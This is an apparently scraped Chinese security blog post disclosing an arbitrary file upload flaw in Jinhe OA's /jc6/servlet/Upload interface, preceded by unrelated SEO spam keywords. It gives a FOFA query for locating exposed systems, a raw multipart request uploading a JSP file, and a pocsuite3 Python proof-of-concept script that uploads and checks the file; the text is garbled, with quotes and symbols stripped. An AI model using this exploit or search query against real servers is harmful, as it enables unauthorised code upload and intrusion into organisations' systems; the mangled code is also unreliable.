青岛网站运营推广,wordpress 慢集市,滦平县建设局网站,石家庄建设网站公司哪家好免责声明
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
漏洞描述
金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。 fofa语句
app金和网络-金和OA||body/jc6/platform/sys/login
poc加检测
POST /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/ HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d--ee055230808ca4602e92d0b7c4ecc63d
Content-Disposition: form-data; nameimg; filename1.jsp
Content-Type: image/jpeg% out.println(tteesstt1); %
--ee055230808ca4602e92d0b7c4ecc63d-- 上传成功后拼接返回的路径url/jc6/路径 poc脚本
脚本使用pocsuite框架
# _*_ coding:utf-8 _*_
# Time : 2024/1/16
# Author: 炼金术师诸葛亮
import re
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_strclass jinhe_jc6_upload(POCBase):pocDesc 金和OA jc6/servlet/Upload接口任意文件上传漏洞author 炼金术师诸葛亮createDate 2024-1-16name 金和OA jc6/servlet/Upload接口任意文件上传漏洞def _verify(self):result {}url self.url /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/check_path self.url /test.aspxheaders {User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1),Accept: */*,Accept-Encoding: gzip, deflate,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2,Connection: close,Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d}try:data --ee055230808ca4602e92d0b7c4ecc63d\r\nContent-Disposition: form-data; nameimg; filename1.jsp\r\nContent-Type: image/jpeg\r\n\r\n% out.println(tteesstt1); %\r\n--ee055230808ca4602e92d0b7c4ecc63d--response requests.post(url, headersheaders, datadata)if response.status_code 200 and upload in response.text:rtextresponse.textpath re.search(rarr\[2](.*?), rtext)if path:check_path self.url /jc6/ path.group(1)check_response requests.get(check_path)if check_response.status_code 200 and tteesstt1 in check_response.text:result[VerifyInfo] {}return self.parse_output(result)except Exception as e:passregister_poc(jinhe_jc6_upload)
脚本利用